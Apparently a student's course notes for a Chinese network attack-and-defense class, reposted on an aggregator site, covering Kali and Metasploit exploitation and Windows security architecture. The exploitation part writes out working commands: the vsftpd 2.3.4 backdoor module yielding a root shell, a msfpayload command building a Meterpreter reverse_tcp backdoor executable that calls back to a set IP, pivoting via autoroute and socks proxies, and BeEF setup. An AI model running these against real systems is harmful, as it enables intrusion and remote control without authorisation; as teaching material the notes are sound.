2017-2018-2 20179207 《网络攻防技术》第七周作业

Posted 2020-10-31 konghui0708

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了2017-2018-2 20179207 《网络攻防技术》第七周作业相关的知识，希望对你有一定的参考价值。

kali视频（26-31）（漏洞利用）

漏洞利用之检索与利用

漏洞利用工具集

1.searchsploit

Exploit Database->searchsploit

2.pattern create测试漏洞

armitage结合MSF进行利用
3.jboss-autopwn-linux/win
专门针对Jboss的漏洞利用工具
4.ikat
自动化开启，等待目标访问中招。
5.termineter
评估智能电表的安全性。

漏洞利用之metasploit基础

1.启动服务：

在kali中使用metasploit，需要先使用命令

service postgresql start

开启PostgreSQL数据库服务，使用命令

msfconsole

2.开启metasploit服务，然后就可以完整的利用msf数据库查询exploit和记录。

3.首先用nmap -sV扫描目标主机和端口上运行的软件的版本。结果显示目标主机运行着ftp服务器，且版本为vsftpd 2.3.4(此版本的vsftpd存在着漏洞，攻击者可以远程获取目标主机的root权限)。

4.输入use exploit/unix/ftp/vsftpd_234_backdoor，提示符提示进入到该路径下，show options查看需要设置的相关项。提示需要设置RHOST和RPORT（端口默认为21)

5.接下来选择payload，输入命令set payload，按Tab键自动补齐攻击载荷cmd/unix/interact，show options查看需要设置的相关项，设置结束后输入exploit即可实施攻击。

结果返回目标主机的shell，获取了目标主机的root权限，可以输入命令查看id、网络配置等，攻击也就可以顺利实施。

漏洞利用之Meterpreter介绍

1.生成Meterpreter后门；打开MSF，开启监听（选择exploit/multi/handler）；在目标机器上执行door.exe；

2.msfpayload windows/meterpreter/reverse_tcp LHOST=222.28.136.234 LPORT=2333 R | msfencode -t exe -c 5 > /root/door.exe

3.查看自己的IP地址，LHOST、LPORT为reverse_tcp的参数，可以在msf里查看到（记得把服务启动）

4.用use exploit/multi/handler来接收返回的连接
设置reverse_tcp的LHOST、LPORT参数

漏洞利用之Metasploit后渗透测试

1.查看跳板机的网卡

ifconfig

2.添加路由表

run autoroute -s 10.0.0.1

3.开socks代理

background 把session置于后台
search socks  使用socks开代理
use auxiliary/server/socks4a
showoptions
exploit

4.通过background和sessions -i可以自由切换进入session
5.输入run可以看到在meterpreter上可以做的很多命令
6.通过run post/可以看到后渗透测试的模块
7.扫描内网信息

run arp_scanner -r 目标IP地址

内网端口转发

upload lcx.exe c:\\ 上传到C盘根目录

漏洞利用之beEf

1、在命令行下启动

BeeFbeef-xss

2、用户名和密码都是beef

3、输入测试网站，可以看到在线机器

4、对网站进行攻击

5、Proxy功能（代理功能）
选中目标主机，点右键，在菜单中选中Use as Proxy；然后在Rider选项卡中的Forge Request编辑并发送想要发送的内容

6、BeEF默认是不加载Metasploit的，如果要使用Metasploit丰富的攻击模块，需要做些配置.
配置

首先打开beef xss目录
cd /usr/share/beef-xss/
ls
nano config.yaml

编辑一下，可以看到有很多配置信息，包括用户名、密码都可以在这设置，在此将Metasploit的false修改为true

漏洞利用之set

第七章 Windows操作系统安全防护

Windows操作系统的发展与现状

Windows在桌面操作系统中占有非常高的市场份额，Windows XP系统在国内仍有大量的用户

Windows操作系统基本结构
1、Windows操作系统内核基本模块：Windows执行体、Windows内核体、设备驱动程序、硬件抽象层、Windows窗口与图形界面接口内核实现代码。

2、Windows操作系统在用户态的代码模块：系统支持进程、环境子系统服务进程、服务进程、用户应用软件、核心子系统DLL。

3、核心机制：Windows进程和线程管理机制、Windows内存管理机制、Windows文件管理机制、Windows注册表管理机制、Windows的网络机制。
Windows系统的网络结构，从OSI网络参考模型的物理层到应用层，各层对应的Windows网络组件模块包括：

①网卡硬件设备驱动程序，位于OSI物理层

②NDIS库及miniport驱动程序，位于OSI链路层

③TDI传输层，也被称为网络协议驱动，位于OSI网络层与传输层

④网络API DLL 及TDI客户端，对应OSI会话层与表示层

⑥网络应用程序与服务进程，对应OSI应用层

**Windows操作系统的安全体系结构与机制 **

1、Windows安全体系结构

基于引用监控器（Reference Monitor）模型来实现基本的对象安全模型。最核心的是位于内核中的SRM（Security Reference Monitor）安全引用监控器，以及位于用户态的LSASS安全服务。

2、Windows身份认证机制

分为用户，用户组，和计算机三大类。对于每个安全主体，以时间和空间上都全局唯一的SID安全标识符来进行标识。

Windows用户密码经过加密处理后被保存于SAM或者活动目录AD中，其中本地用户账户口令信息经过不可逆的128位随机秘钥Hash加密后存储在SAM文件中。

Windows进程、GINA图形化登录窗口，与LSASS服务通过协作来完成本地身份认证过程。

3、Windows授权与访问控制机制

Windows授权与访问控制机制是基于引用监控器模型，由内核中的SRM模块与用户态的LSASS服务共同来实施。

Windows对于系统中所有需要保护的资源都抽象成对象，而对每个对象会关联一个SD安全描述符（Security Descriptor）都会关联一个对象描述符，有以下属性组成：Owner SID、Group SID、DACL 自主访问控制列表、SACL 系统审计访问控制列表。

4、Windows安全审计机制

系统审计策略在本地安全策略中由系统管理员定义，来确定系统对哪些事件进行记录。

5、Windows的其他安全机制

Windows安全中心中集成了对于保护Windows系统安全稳定运行最为关键的三项安全措施：防火墙，补丁自动更新，以及病毒防护。除了安全中心外，Windows的安全特性还包括IPSec加密与验证机制、EFS加密文件系统、Windows文件保护机制、捆绑的IE浏览器所提供的隐私保护与浏览安全保护机制等。

6、Windows远程安全攻防技术

Windows远程攻击技术可分为：远程口令猜测与破解攻击、攻击Windows网络服务、攻击Windows客户端及用户

7、Windows安全漏洞发现、利用与修补过程

安全漏洞公开披露信息库：几个知名的通用漏洞信息库：CVE、NVD、SecurityFocus、OSVDB等。

8、针对特定目标的渗透测试攻击过程：

①漏洞扫描测试

②查找针对发现漏洞的渗透代码

③实施渗透测试

9、使用Metasploit软件实施渗透测试

Metasploit是完全开源的渗透测试软件。采用开发框架和模块组件的可扩展模型，以Ruby语言编写的Metasploit

Framework（MSF）库作为整个软件的基础核心，为渗透测试组件的开发与测试提供平台；模块组件是真正实施渗透攻击的代码。

Metasploit提供了CLI、Console、Web和GUI四种不同的用户交互接口，其中Console终端是比较常用的方式。